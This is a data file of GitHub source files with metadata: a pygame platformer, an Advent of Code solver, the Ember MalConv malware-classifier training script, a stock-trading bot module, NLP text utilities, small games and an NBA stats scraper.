lowest_plat.rect.bottom:\r\n lowest_plat = hit\r\n\r\n # Checking whether the player are out of the platform or not\r\n if self.player.pos.x < lowest_plat.rect.right + 7 and \\\r\n self.player.pos.x > lowest_plat.rect.left - 7:\r\n # If the player feet get on the platform ony then he can land on it\r\n if self.player.pos.y < lowest_plat.rect.centery:\r\n self.player.pos.y = hits[0].rect.top\r\n self.player.vel.y = 0\r\n self.player.jumping = False\r\n\r\n # if player reaches top 1/4 of the screen\r\n if self.player.rect.top <= HEIGHT / 4:\r\n if random.randrange(100)<15:\r\n Cloud(self)\r\n self.player.pos.y += max(abs(self.player.vel.y), 2)\r\n for cloud in self.clouds:\r\n cloud.rect.y += max(abs(self.player.vel.y/2), 2)\r\n for mob in self.mobs:\r\n mob.rect.y += max(abs(self.player.vel.y), 2)\r\n for plat in self.platforms:\r\n plat.rect.y += max(abs(self.player.vel.y), 2)\r\n if plat.rect.top >= HEIGHT:\r\n plat.kill()\r\n self.score += 10\r\n\r\n # If a player hits a powerup\r\n pow_hits = pyg.sprite.spritecollide(self.player, self.powerups, True)\r\n for powerup in pow_hits:\r\n if powerup.type == 'boost':\r\n self.boost_sound.play()\r\n self.player.vel.y = - BOOST_POWER\r\n self.player.jumping = False\r\n\r\n\r\n # If player hits bottom of the screen (Die!)\r\n if self.player.rect.bottom > HEIGHT:\r\n for sprite in self.all_sprites:\r\n sprite.rect.y -= max(self.player.vel.y, 10)\r\n if sprite.rect.bottom < 0:\r\n sprite.kill()\r\n if len(self.platforms) == 0:\r\n self.playing = False\r\n\r\n\r\n # Spawn new platform to keep same average number\r\n while len(self.platforms) < 6:\r\n width = random.randint(50, 150)\r\n x = random.randint(0, WIDTH-width)\r\n y = random.randint(-75, -30)\r\n p = Platform(self, x, y)\r\n self.platforms.add(p)\r\n self.all_sprites.add(p)\r\n\r\n\r\n def events(self):\r\n # Game loop - events\r\n # Processing input (events)\r\n for event in pyg.event.get():\r\n # Check for closing window\r\n if event.type == pyg.QUIT:\r\n if self.playing:\r\n self.playing = False\r\n self.running = False\r\n if event.type == pyg.KEYDOWN:\r\n if event.key == pyg.K_SPACE:\r\n self.player.jump()\r\n\r\n if event.type == pyg.KEYUP:\r\n if event.key == pyg.K_SPACE:\r\n self.player.jump_cut()\r\n\r\n\r\n def draw(self):\r\n # Game loop - draw\r\n # To drawing updated frame on the screen\r\n self.screen.fill(BGCOLOR)\r\n # To draw all the updated sprites\r\n self.all_sprites.draw(self.screen)\r\n self.screen.blit(self.player.image, self.player.rect)\r\n self.screen.blit(self.mob.image, self.mob.rect)\r\n self.draw_text((f\"Score: {self.score}\"), self.font_name_2, 23, color[\"white\"], 60, 15)\r\n if self.score > self.highscore:\r\n self.draw_text(f\"High Score: {self.score}\", self.font_name_2, 23, color[\"white\"], WIDTH - 90, 15)\r\n else :\r\n self.draw_text(f\"High Score: {self.highscore}\", self.font_name_2, 23, color[\"white\"], WIDTH-90, 15)\r\n # After drawing everything flip the display\r\n pyg.display.flip()\r\n\r\n def show_start_screen(self):\r\n # Game splash / Start screen\r\n self.background(\"splash.jpeg\")\r\n\r\n # Initializing game start music\r\n pyg.mixer.music.load(path.join(self.snd_dir, 'Yippee.wav'))\r\n pyg.mixer.music.play(loops = -1)\r\n\r\n #self.screen.fill(BGCOLOR)\r\n self.draw_text(TITTLE, self.font_name_2, 55, color[\"white\"], WIDTH/2, HEIGHT/4)\r\n self.draw_text(\"Arrows to move Space to jump\", self.font_name_2, 25, color[\"white\"], WIDTH/2, HEIGHT/2)\r\n self.draw_text(\"Press any key to play\", self.font_name_2, 25, color[\"black\"], WIDTH/2, HEIGHT*3/4+30)\r\n self.draw_text(f\"High Score: {self.highscore}\", self.font_name_2, 25, color[\"white\"], WIDTH/2, 15)\r\n pyg.display.flip()\r\n self.wait_for_key()\r\n pyg.mixer_music.fadeout(500)\r\n\r\n def background(self, image):\r\n # Changing start/end screen background\r\n self.image = path.join(self.img_dir, image)\r\n bg = pygame.image.load(self.image)\r\n bg = pyg.transform.scale(bg, (WIDTH, HEIGHT))\r\n self.screen.blit(bg, (0, 0))\r\n\r\n def show_go_screen(self):\r\n\r\n # Game over / Continue screen\r\n\r\n\r\n if not self.running:\r\n return\r\n\r\n # Initializing game ending music\r\n pyg.mixer.music.load(path.join(self.snd_dir, 'prologue.mp3'))\r\n pyg.mixer.music.play(loops=-1)\r\n self.background(\"end.jpeg\")\r\n #self.screen.fill(BGCOLOR)\r\n self.draw_text(\"GAME OVER\", self.font_name_2, 60, color[\"white\"], WIDTH / 2, HEIGHT / 4)\r\n self.draw_text(f\"Your Score: {self.score}\", self.font_name_2, 25, color[\"white\"], WIDTH / 2, HEIGHT / 2)\r\n self.draw_text(\"Press any key to play again\", self.font_name_2, 25, color[\"white\"], WIDTH / 2, HEIGHT * 3 / 4+30)\r\n if self.score > self.highscore:\r\n self.highscore = self.score\r\n self.draw_text(\"NEW HIGH SCORE!\", self.font_name_2, 25, color[\"red\"], WIDTH / 2, HEIGHT / 2 + 40)\r\n with open(path.join(self.dir, HS_FILE), \"w\") as f:\r\n f.write(str(self.score))\r\n else:\r\n self.draw_text(f\"High Score: {self.highscore} \", self.font_name_2, 25, color[\"red\"], WIDTH / 2, HEIGHT / 2 + 40)\r\n\r\n pyg.display.flip()\r\n self.wait_for_key()\r\n pyg.mixer_music.fadeout(500)\r\n\r\n\r\n\r\n def wait_for_key(self):\r\n waiting = True\r\n while waiting:\r\n self.clock.tick(FPS)\r\n for event in pyg.event.get():\r\n if event.type == pyg.QUIT:\r\n waiting = False\r\n self.running = False\r\n if event.type == pyg.KEYUP:\r\n waiting = False\r\n\r\n def draw_text(self, text, font_style, size, color, x, y):\r\n font = pygame.font.Font(font_style, size)\r\n text_surface = font.render(text, True, color)\r\n text_rect = text_surface.get_rect()\r\n text_rect.midtop = (x, y)\r\n self.screen.blit(text_surface, text_rect)\r\n\r\nif __name__ == \"__main__\":\r\n g = Game()\r\n g.show_start_screen()\r\n while g.running:\r\n g.new()\r\n g.show_go_screen()\r\n\r\n pyg.quit()\r\n","repo_name":"Ronak-kumar/Jumper-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"6700695229","text":"import sys\nfrom collections import defaultdict\nimport re\n\ndef initialise():\n with open(sys.argv[1]) as file:\n data = file.readlines()\n\n cuboids = []\n\n for line in data:\n op = line.split(' ')[0]\n ranges = ''.join(line.split(' ')[1:])\n values = [int(x) for x in re.findall(r'-{0,1}\\d{1,10}', ranges)]\n cuboids.append((op, tuple(values)))\n\n return cuboids\n\n\n\ndef apply_cuboids_to_point(coords, cuboids):\n x,y,z = coords\n\n result = False\n\n for cuboid in cuboids:\n op = cuboid[0]\n xmin, xmax, ymin, ymax, zmin, zmax = cuboid[1]\n\n if xmin <= x <= xmax and ymin <= y <= ymax and zmin <= z <= zmax:\n if op == 'on':\n result = True\n else:\n result = False\n \n return result\n\ndef iterate_over_points(cuboids):\n count=0\n \n bigcube = range(-50,51)\n\n for x in bigcube:\n for y in bigcube:\n for z in bigcube:\n if apply_cuboids_to_point((x,y,z), cuboids):\n count += 1\n\n return count\n\ncuboids = initialise()\n\nprint(cuboids)\n\nanswer = iterate_over_points(cuboids)\n\nprint(answer)\n\n\n","repo_name":"DavidBartram/advent-of-code","sub_path":"2021/day22-1.py","file_name":"day22-1.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"43876909484","text":"#!/usr/bin/python\n'''defines the MalConv architecture.\nAdapted from https://arxiv.org/pdf/1710.09435.pdf\nThings different about our implementation and that of the original paper:\n * The paper uses batch_size = 256 and SGD(lr=0.01, momentum=0.9, decay=UNDISCLOSED, nesterov=True )\n * The paper didn't have a special EOF symbol\n * The paper allowed for up to 2MB malware sizes, we use 1.0MB because of memory on a Titan X\n '''\n\ndef main(): \n from keras.layers import Dense, Conv1D, Activation, GlobalMaxPooling1D, Input, Embedding, Multiply\n from keras.models import Model\n from keras import backend as K\n from keras import metrics\n import multi_gpu\n import os\n import math\n import random\n import argparse\n import os\n import numpy as np\n import requests\n\n batch_size = 100\n input_dim = 257 # every byte plus a special padding symbol\n padding_char = 256\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpus', help='number of GPUs', default=1)\n\n args = parser.parse_args()\n ngpus = int(args.gpus)\n\n if os.path.exists('malconv.h5'):\n print(\"restoring malconv.h5 from disk for continuation training...\")\n from keras.models import load_model\n basemodel = load_model('malconv.h5')\n _, maxlen, embedding_size = basemodel.layers[1].output_shape\n input_dim\n else:\n maxlen = 2**20 # 1MB\n embedding_size = 8 \n\n # define model structure\n inp = Input( shape=(maxlen,))\n emb = Embedding( input_dim, embedding_size )( inp )\n filt = Conv1D( filters=128, kernel_size=500, strides=500, use_bias=True, activation='relu', padding='valid' )(emb)\n attn = Conv1D( filters=128, kernel_size=500, strides=500, use_bias=True, activation='sigmoid', padding='valid')(emb)\n gated = Multiply()([filt,attn])\n feat = GlobalMaxPooling1D()( gated )\n dense = Dense(128, activation='relu')(feat)\n outp = Dense(1, activation='sigmoid')(dense)\n\n basemodel = Model( inp, outp )\n\n basemodel.summary() \n\n print(\"Using %i GPUs\" %ngpus)\n\n if ngpus > 1:\n model = multi_gpu.make_parallel(basemodel,ngpus)\n else:\n model = basemodel\n\n from keras.optimizers import SGD\n model.compile( loss='binary_crossentropy', optimizer=SGD(lr=0.01,momentum=0.9,nesterov=True,decay=1e-3), metrics=[metrics.binary_accuracy] )\n\n def bytez_to_numpy(bytez,maxlen):\n b = np.ones( (maxlen,), dtype=np.uint16 )*padding_char\n bytez = np.frombuffer( bytez[:maxlen], dtype=np.uint8 )\n b[:len(bytez)] = bytez\n return b\n\n def getfile_service(sha256,url=None,maxlen=maxlen):\n if url is None:\n raise NotImplementedError(\"You must provide your own url for getting file bytez by sha256\")\n r = requests.get( url, params={'sha256':sha256} )\n if not r.ok:\n return None\n return bytez_to_numpy( r.content, maxlen ) \n\n def generator( hashes, labels, batch_size, shuffle=True ):\n X = []\n y = []\n zipped = list(zip(hashes, labels))\n while True:\n if shuffle:\n random.shuffle( zipped )\n for sha256,l in zipped:\n x = getfile_service(sha256)\n if x is None:\n continue\n X.append( x )\n y.append( l )\n if len(X) == batch_size:\n yield np.asarray(X,dtype=np.uint16), np.asarray(y)\n X = []\n y = []\n\n import pandas as pd\n train_labels = pd.read_csv('ember_training.csv.gz')\n train_labels = train_labels[ train_labels['y'] != -1 ] # get only labeled samples\n labels = train_labels['y'].tolist()\n hashes = train_labels['sha256'].tolist()\n\n from sklearn.model_selection import train_test_split\n hashes_train, hashes_val, labels_train, labels_val = train_test_split( hashes, labels, test_size=200 )\n\n train_gen = generator( hashes_train, labels_train, batch_size )\n val_gen = generator( hashes_val, labels_val, batch_size )\n\n from keras.callbacks import LearningRateScheduler\n\n base = K.get_value( model.optimizer.lr )\n def schedule(epoch):\n return base / 10.0**(epoch//2)\n\n model.fit_generator(\n train_gen,\n steps_per_epoch=len(hashes_train)//batch_size,\n epochs=10,\n validation_data=val_gen,\n callbacks=[ LearningRateScheduler( schedule ) ],\n validation_steps=int(math.ceil(len(hashes_val)/batch_size)),\n )\n\n basemodel.save('malconv.h5')\n\n test_labels = pd.read_csv('ember_test.csv.gz')\n labels_test = test_labels['y'].tolist()\n hashes_test = test_labels['sha256'].tolist()\n\n test_generator = generator(hashes_test,labels_test,batch_size=1,shuffle=False)\n test_p = basemodel.predict_generator( test_generator, steps=len(test_labels), verbose=1 )\n\n\nif __name__ == '__main__':\n print('*'*80)\n print('''\nThis is nonfunctional demonstration code that is provided for convenience. It shows\n- The MalConv structure used in our paper\n- Training procedure used in the paper\n- How to load the weights for the MalConv model that we used.\n\nIt may be made functional by modifying the code to retrieve file contents by sha256\nfrom a user-defined URL.\n\nYou may use the provided weights under the Ember AGPL-3.0 license included in the parent directory.\nWe also ask that you cite the original MalConv paper and refer to the Ember paper as the implementation.\n\n(1) E. Raff, J. Barker, J. Sylvester, R. Brandon, B. Catanzaro, C. Nicholas, \"Malware Detection by Eating a Whole EXE\", in ArXiv e-prints. Oct. 2017.\n\n@ARTICLE{raff2017malware,\n title={Malware detection by eating a whole exe},\n author={Raff, Edward and Barker, Jon and Sylvester, Jared and Brandon, Robert and Catanzaro, Bryan and Nicholas, Charles},\n journal={arXiv preprint arXiv:1710.09435},\n year={2017}\n}\n\n(2) H. Anderson and P. Roth, \"EMBER: An Open Dataset for Training Static PE Malware Machine Learning Models”, in ArXiv e-prints. Apr. 2018.\n\n@ARTICLE{2018arXiv180404637A,\n author = {{Anderson}, H.~S. and {Roth}, P.},\n title = \"{EMBER: An Open Dataset for Training Static PE Malware Machine Learning Models}\",\n journal = {ArXiv e-prints},\n archivePrefix = \"arXiv\",\n eprint = {1804.04637},\n primaryClass = \"cs.CR\",\n keywords = {Computer Science - Cryptography and Security},\n year = 2018,\n month = apr,\n adsurl = {http://adsabs.harvard.edu/abs/2018arXiv180404637A},\n}\n''')\n print('*'*80)\n\n #main() # uncomment this line after fixing the URL NotImplementedError above","repo_name":"elastic/ember","sub_path":"malconv/malconv.py","file_name":"malconv.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"en","doc_type":"code","stars":850,"dataset":"github-code","pt":"79"}
+{"seq_id":"74221843775","text":"from collections import deque\n\n\nclass TreeNode:\n\n def __init__(self, value):\n self.value = value\n self.children = []\n\n def __repr__(self):\n return self.value\n\n\ndef print_tree(root):\n\n stack = deque()\n stack.append([root, 0])\n level_str = \"\\n\"\n\n while len(stack) > 0:\n node, level = stack.pop()\n if level > 0 and len(stack) > 0 and level <= stack[-1][1]:\n level_str += \" \"*(level-1) + \"├─\"\n elif level > 0:\n level_str += \" \"*(level-1) + \"└─\"\n level_str += str(node.value)\n level_str += \"\\n\"\n level += 1\n for child in node.children:\n stack.append([child, level])\n\n print(level_str)\n\n\nsample_root_node = TreeNode(\"A\")\ntwo = TreeNode(\"B\")\nthree = TreeNode(\"C\")\nsample_root_node.children = [three, two]\nfour = TreeNode(\"D\")\nfive = TreeNode(\"E\")\nsix = TreeNode(\"F\")\nseven = TreeNode(\"G\")\ntwo.children = [five, four]\nthree.children = [seven, six]\n\n\nprint_tree(sample_root_node)\n","repo_name":"dom-wright/data_structures_algorithms","sub_path":"algorithms/search/tree/tree_print_path.py","file_name":"tree_print_path.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"70417724095","text":"\"\"\"модуль для управления состоянием профиля пользователя\"\"\"\r\nimport broker\r\nimport db_requests\r\nfrom decimal import Decimal\r\n\r\nfrom sqlite3 import IntegrityError\r\n\r\nimport exchange\r\nfrom custom_types import AssetPrice, Order\r\nimport exceptions\r\n\r\n\r\ndef onboarding(user_id: int) -> bool:\r\n \"\"\"Онбординг\"\"\"\r\n try:\r\n db_requests.insert(\"users\", {\"user_id\": user_id})\r\n return True\r\n except IntegrityError:\r\n return False\r\n\r\n\r\ndef get_balance(user_id: int) -> Decimal:\r\n \"\"\"Получить сведения о балансе\"\"\"\r\n try:\r\n balance_dict = db_requests.select(\"users\", [\"balance\"], user_id)\r\n balance = Decimal(balance_dict['balance'])\r\n return balance\r\n except KeyError:\r\n db_requests.insert(\"users\", {\"user_id\": user_id})\r\n balance = Decimal(0)\r\n return balance\r\n\r\n\r\ndef get_lots(user_id: int, asset_name: str) -> int:\r\n try:\r\n pcs = db_requests.select(\"users\", [asset_name], user_id)[asset_name]\r\n lots = pcs / AssetPrice.lot_weight.value\r\n return lots\r\n except KeyError:\r\n db_requests.insert(\"users\", {\"user_id\": user_id})\r\n return 0\r\n\r\n\r\ndef change_balance(user_id: int, money: Decimal) -> Decimal:\r\n \"\"\"Изменить баланс\"\"\"\r\n try:\r\n balance_dict = db_requests.select(\"users\", [\"balance\"], user_id)\r\n balance = Decimal(balance_dict['balance'])\r\n new_balance = balance + money\r\n db_requests.update_balance(user_id, str(new_balance))\r\n return new_balance\r\n except KeyError:\r\n db_requests.insert(\"users\", {\"user_id\": user_id})\r\n db_requests.update_balance(user_id, str(money))\r\n return money\r\n\r\n\r\ndef change_asset_pcs(order: Order, difference: int) -> None:\r\n \"\"\"Изменить кол-во акций\"\"\"\r\n try:\r\n asset_dict = db_requests.select(\"users\", [order.asset_name], order.user_id)\r\n asset_pcs = asset_dict[order.asset_name]\r\n new_pcs = asset_pcs + difference\r\n db_requests.update_asset_pcs(order.user_id, order.asset_name, new_pcs)\r\n db_requests.update_status(order.order_id)\r\n except KeyError:\r\n db_requests.insert(\"users\", {\"user_id\": order.user_id})\r\n db_requests.update_asset_pcs(order.user_id, order.asset_name, difference)\r\n\r\n\r\ndef get_portfolio(user_id: int) -> dict:\r\n \"\"\"Получить сведения о портфеле\"\"\"\r\n asset_list = AssetPrice.ASSETS.value\r\n portfolio = db_requests.select(\"users\", asset_list, user_id)\r\n if len(portfolio) != 0:\r\n value = Decimal(0)\r\n for asset_name in portfolio.keys():\r\n value += AssetPrice[asset_name].value * portfolio[asset_name]\r\n portfolio[\"value\"] = value\r\n return portfolio\r\n else:\r\n db_requests.insert(\"users\", {\"user_id\": user_id})\r\n portfolio = db_requests.select(\"users\", asset_list, user_id)\r\n portfolio[\"value\"] = Decimal(0)\r\n return portfolio\r\n\r\n\r\ndef parse_order(order: str) -> dict:\r\n \"\"\" Распарсить запрос из телеграмма\"\"\"\r\n parsed_order = {}\r\n parsed_request = order.split()\r\n if len(parsed_request) == 2:\r\n if parsed_request[0] in AssetPrice.ASSETS.value:\r\n parsed_order['asset'] = parsed_request[0]\r\n else:\r\n raise exceptions.NotCorrectMessage(f\"Неверный формат. Проверьте написание названия акции.\\n\"\r\n f\"Доустпный список акций: {' '.join(AssetPrice.ASSETS.value)}\"\r\n )\r\n try:\r\n parsed_order['lots'] = int(parsed_request[1])\r\n except ValueError:\r\n raise exceptions.NotCorrectMessage(\"Неверный формат. Проверьте написание кол-ва лотов. \")\r\n if parsed_order['lots'] <= 0:\r\n raise exceptions.NotCorrectMessage(f\"Неверный формат. Проверьте написание кол-ва лотов.\\n\"\r\n f\"Число должно быть больше, чем 0\"\r\n )\r\n return parsed_order\r\n else:\r\n raise exceptions.NotCorrectMessage(f\"Неверный формат. Проверьте написание команды.\\n\"\r\n f\"Команды:\\n\"\r\n f\"/buy asset lots\\n\"\r\n f\"/sell asset lots\\n\"\r\n f\"Где, asset -- название актива, lots -- кол-во лотов (лот = 10 шт.)\"\r\n )\r\n\r\n\r\ndef sell_assets(order: Order) -> bool:\r\n \"\"\"Создать заявку на покупку акций\"\"\"\r\n lots = get_lots(order.user_id, order.asset_name)\r\n if broker.check_assets(order, lots):\r\n broker.create_sell_order(order)\r\n exchange.close_the_deal(order)\r\n else:\r\n raise exceptions.BrokerException(f\"Не хватает акций.\\n\"\r\n f\"Купите пакеты акций: /buy {order.asset_name} {order.lots}\")\r\n return True\r\n\r\n\r\ndef buy_assets(order: Order) -> bool:\r\n \"\"\"Создать заявку на покупку акций\"\"\"\r\n balance = get_balance(order.user_id)\r\n if broker.check_balance(order, balance):\r\n broker.create_buy_order(order)\r\n exchange.close_the_deal(order)\r\n else:\r\n raise exceptions.BrokerException(f\"Не хватает средств.\\n\"\r\n f\"Пополните баланс командой: /change_balance {order.price}\")\r\n return True\r\n\r\n\r\ndef get_my_orders(user_id: int) -> str:\r\n \"\"\"получить все заявки от профиля по id\"\"\"\r\n my_orders = db_requests.fetchall_by_id(\"reg_orders\", [\"type\", \"asset\", \"price\", \"status\", \"date\"],\r\n user_id)\r\n message = ''\r\n if len(my_orders) == 0:\r\n message = 'У профиля нет заявок'\r\n return message\r\n else:\r\n for row in my_orders:\r\n for key in row.keys():\r\n message += str(row[key]) + ' '\r\n message += '\\n'\r\n return message\r\n","repo_name":"yaroslavcherkaev/sbercontest","sub_path":"profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"50450438273","text":"import httplib2\nfrom apiclient import discovery\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport settings\n\nhttpAuth = settings.credentials.authorize(httplib2.Http())\nservice = discovery.build('sheets', 'v4', http=httpAuth)\n\nres = service.spreadsheets().values().batchUpdate(\n spreadsheetId=settings.spreadsheetId,\n body={\n 'valueInputOption': 'USER_ENTERED',\n 'data': [\n {\n 'range': 'First list!B2:D5',\n 'majorDimension': 'ROWS',\n 'values': [\n ['Test B', 'Test C', 'Test D'],\n ['24', '5', '=B3/C3']\n ]\n }\n ]\n }\n).execute()\n","repo_name":"TRTSS/SteamParserV1","sub_path":"editSheet.py","file_name":"editSheet.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"70965751616","text":"import string\nfrom nltk.corpus import stopwords\nfrom collections import Counter\n\ndef strip_punct(s):\n while True:\n if s:\n if s[-1] in string.punctuation: s = s[:-1]\n elif s[0] in string.punctuation: s = s[1:]\n else: return s\n else: return ''\n\n\ndef add_space(s):\n if not s: return ''\n result = s[0]\n prev_c = s[0]\n for c in s[1:]:\n if prev_c in string.punctuation:\n result += ' '\n result += c\n else:\n if c in string.punctuation:\n result += ' '\n result += c\n else:\n result += c\n prev_c = c\n result = ' '.join(result.split())\n return result\n\n\ndef normalize_phrase(phrase, subq_config, ignore=[]):\n # Rule 1: split composite mentions based on 'and'\n if subq_config['split_composite_mention']:\n phrases = [p.strip() for p in phrase.split(' and ')]\n else:\n phrases = [phrase.strip()]\n\n # Rule 2: remove punctuations\n if subq_config['remove_punctuation']:\n phrases = [strip_punct(p).strip() for p in phrases if strip_punct(p).strip() != '']\n \n # Rule 3: remove lowercase phrases\n if subq_config['remove_lowercase_phrase']:\n phrases = [p for p in phrases if p != p.lower()]\n\n # Rule 4: remove the def 'the'\n if subq_config['remove_the']:\n phrases = [' '.join(p.split()[1:]) if p.split()[0].lower() == 'the' else p for p in phrases]\n\n # Rule 5: remove short phrase\n phrases = [p for p in phrases if len(p) >= subq_config['min_phrase_length']]\n \n # Rule 6: remove stopword\n if subq_config['remove_stopword']:\n phrases = [p for p in phrases if p.lower() not in stopwords.words('english')]\n \n # Rule 7: remove subtype\n if subq_config['remove_subtype']:\n phrases = [p for p in phrases if p.lower() not in ignore]\n \n # find the start positions of phrases\n if len(phrases) > 0:\n starts = [phrase.find(p) for p in phrases]\n else:\n starts = None\n\n return phrases, starts\n\n\ndef postproc_retrieved_data(retrieved_data, nlp, subq_config, ignore=[]):\n # This code normalizes retrieved phrases, detects abbreviations, and merges duplicate sentences\n \n processed_data = {}\n\n for json_example in retrieved_data:\n sent = json_example['sentence']\n pos = json_example['pos']\n phrase = json_example['phrase']\n\n if sent not in processed_data.keys():\n processed_data[sent] = {\n 'sentence': sent,\n 'poss': [pos],\n 'phrases': [phrase]\n }\n else :\n processed_data[sent]['poss'].append(pos)\n processed_data[sent]['phrases'].append(phrase)\n\n for sent in processed_data.keys():\n json_example = processed_data[sent]\n \n abbreviations = {}\n doc = nlp(json_example['sentence'])\n for abrv in doc._.abbreviations:\n if abrv.text.lower() not in ignore :\n abbreviations[abrv._.long_form.text] = [abrv.text, (abrv.start_char, abrv.end_char)]\n\n processed_data[sent]['abbreviations'] = abbreviations\n\n phrases = []\n pos_mark = [0 for _ in range(len(json_example['sentence']))]\n for phrase, pos in zip(json_example['phrases'], json_example['poss']):\n normalized_names, starts = normalize_phrase(phrase, subq_config, ignore)\n\n if normalized_names == []:\n pass\n else:\n # If there are conflicts between spans within duplicate sentences, the higher-ranked span is selected.\n for nn, st in zip(normalized_names, starts):\n start_idx = pos[0] + st\n\n if nn != json_example['sentence'][start_idx:start_idx+len(nn)]:\n continue\n\n if sum(pos_mark[start_idx:start_idx+len(nn)]) == 0:\n phrases.append({\n 'name': nn,\n 'start': start_idx,\n 'end': start_idx+len(nn)\n })\n\n for i in range(start_idx, start_idx+len(nn)):\n pos_mark[i] = 1\n \n processed_data[sent]['phrases'] = phrases\n del processed_data[sent]['poss']\n \n return processed_data\n\n\ndef preproc_dictionary(dictionary, min_phrase_frequency=0, lowercase_matching=True):\n # This code pre-processes a raw pseudo-dictionary for dictionary matching.\n type_counter = {}\n\n phrases = [p.split(\"\\t\")[0].strip() for p in dictionary]\n\n # add spaces before and after punctuations\n phrases = [add_space(p) for p in phrases]\n\n if lowercase_matching:\n phrases = [p.lower() for p in phrases]\n\n # type of dictionary\n t = dictionary[0].split('\\t')[1].strip()\n for p in phrases:\n if p not in type_counter.keys(): type_counter[p] = Counter()\n type_counter[p][t] += 1\n\n # Remove duplicates\n phrases = list(set(phrases))\n\n processed_phrases = []\n\n cnt = 0\n for p in phrases:\n if max(type_counter[p].values()) > min_phrase_frequency:\n processed_phrases.append(p)\n cnt += 1\n\n return processed_phrases, type_counter\n\n\n","repo_name":"dmis-lab/GeNER","sub_path":"utils/norm_utils.py","file_name":"norm_utils.py","file_ext":"py","file_size_in_byte":5294,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"79"}
+{"seq_id":"16370360314","text":"\"\"\"In Chapter 4 there was a problem that asked you to write a program that lets the user play\nRock-Paper-Scissors against the computer. In that program there were exactly five rounds.\nRewrite the program so that it is a best 3 out of 5. That is, the first player to win three times is\nthe winner.\n\"\"\"\n\nlist=['scissors','rock','paper']\nimport random\n\nyou_win=0\ncomputer_win=0\ni=0\n\nwhile i<5:\n if you_win==3 or computer_win==3:\n \n if you_win==3:\n print(\"you win :)\")\n else:\n print(\"you lose :(\")\n break\n\n computer=random.choice(list)\n print(\"round \",i+1,\":\")\n yourturn=input(\"let's play: \")\n \n while(yourturn not in list):\n yourturn=input(\"oops! play again: \")\n \n else:\n if yourturn==computer:\n print(\"computer choice:\",computer)\n print(\"noone win this round\")\n\n elif((yourturn==list[0] and computer==list[2]) or (yourturn==list[1] and computer==list[0])or(yourturn==list[2] and computer==list[1])): \n print(\"computer choice:\",computer)\n you_win+=1\n print(\"you win this round\")\n \n else:\n print(\"computer choice:\",computer)\n computer_win+=1\n print(\"you lose this round\")\n\n i+=1 \n \nelse:\n print(\"Final:\")\n if you_win>computer_win:\n print(\"you WIN :)\")\n elif computer_win>you_win:\n print(\"you LOSE :(\")\n else:\n print(\"Noone win\")\n","repo_name":"monkeybuzinis/Python","sub_path":"9.while loop/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"}
+{"seq_id":"6294152925","text":"# Criar uma tabela de acordo com as informações do ranking dos players da NBA stats.nba.com\n# Utilizar libs como requests2, pandas, beautifulsoup4 e selenium\n# Aprender webscraping básico.\n\n# Bibliotécas\nimport time\nimport requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.common.exceptions import NoSuchElementException \nimport json\n\n# navegar até o site\nurl = \"https://stats.nba.com/players/traditional/?SeasonType=Playoffs&sort=PLAYER_NAME&dir=1\"\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.get(url)\ntime.sleep(3)\n\n#POPUP do site\npopup = driver.find_element_by_xpath(\"//button[@id='onetrust-accept-btn-handler']\")\nif popup:\n popup.click()\n# ordenar por categorias\ntop10ranking = {}\nrankings = {\n '3points': {'field': 'FG3M', 'label': '3PM'},\n 'points': {'field': 'PTS', 'label': 'PTS'},\n 'assistants': {'field': 'AST', 'label': 'AST'},\n 'rebounds': {'field': 'REB', 'label': 'REB'},\n 'steals': {'field': 'STL', 'label': 'STL'},\n 'blocks': {'field': 'BLK', 'label': 'BLK'},\n}\n\n#Função da tabela\ndef buildrank(type):\n field = rankings[type]['field']\n label = rankings[type]['label']\n \n driver.find_element_by_xpath(f\"//div[@class='nba-stat-table']//table//thead//tr//th[@data-field='{field}']\").click()\n element = driver.find_element_by_xpath(\"//div[@class='nba-stat-table']//table\")\n html_content = element.get_attribute('outerHTML')\n # Parsear o conteúdo com BeautifulSoup\n soup = BeautifulSoup(html_content, 'html.parser')\n table = soup.find(name='table')\n # Estruturar com o Panda\n df_full = pd.read_html(str(table))[0].head(10)\n df = df_full[[\"Unnamed: 0\", \"PLAYER\", \"TEAM\", label]]\n df.columns = ['pos', 'player', 'team', 'total']\n # Transformar os Dados em um dicionário de dados próprio\n return df.to_dict('records')\n\ntop10ranking['points'] = buildrank('points')\n\nfor i in rankings:\n top10ranking[i] = buildrank(i)\n\n#Fechar bot\ndriver.quit()\n\n# Converter e salvar em um arquivo JSON\njs = json.dumps(top10ranking)\nfp = open('ranking.json', 'w')\nfp.write(js)\nfp.close()","repo_name":"RaphaelR89/Webscrapping","sub_path":"NBAranking/nbaranking.py","file_name":"nbaranking.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
